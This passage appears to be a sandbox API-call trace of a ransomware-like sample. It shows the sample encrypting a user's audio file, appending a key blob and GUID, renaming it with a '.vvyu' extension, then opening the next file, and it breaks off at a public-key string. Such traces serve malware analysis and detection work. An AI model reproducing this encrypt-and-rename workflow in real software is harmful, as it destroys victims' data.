[0195.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.531] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.531] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.531] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.531] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.531] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10db0) returned 0x2af5168 [0195.532] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f00 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1f48 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.533] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6470 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.537] GetCurrentThreadId () returned 0x5d8 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8418 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.537] GetCurrentThreadId () returned 0x5d8 [0195.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0195.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f48 | out: hHeap=0x2c0000) returned 1 [0195.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.550] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x10da9, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x10da9, lpOverlapped=0x0) returned 1 [0195.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.552] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10dae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.552] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.553] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.553] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.553] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.554] CloseHandle (hObject=0x584) returned 1 [0195.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.556] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\qIaOB8kqT6Gjfc.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\qiaob8kqt6gjfc.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\qIaOB8kqT6Gjfc.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\qiaob8kqt6gjfc.m4a.vvyu")) returned 1 [0195.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.558] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.561] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa53e6f80, ftCreationTime.dwHighDateTime=0x1d89e59, ftLastAccessTime.dwLowDateTime=0xf2110640, ftLastAccessTime.dwHighDateTime=0x1d8a45f, ftLastWriteTime.dwLowDateTime=0xf2110640, ftLastWriteTime.dwHighDateTime=0x1d8a45f, nFileSizeHigh=0x0, nFileSizeLow=0x67b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VUGuU0EaHk4ce5o.wav", cAlternateFileName="VUGUU0~1.WAV")) returned 1 [0195.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.562] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\VUGuU0EaHk4ce5o.wav") returned=".wav" [0195.562] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\VUGuU0EaHk4ce5o.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\vuguu0eahk4ce5o.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.563] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=26549) returned 1 [0195.564] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.567] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x678f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.567] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0195.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.569] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.569] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x67b5, lpOverlapped=0x0) returned 1 [0195.570] lstrlenA (lpString="-----BEGIN PUBLIC 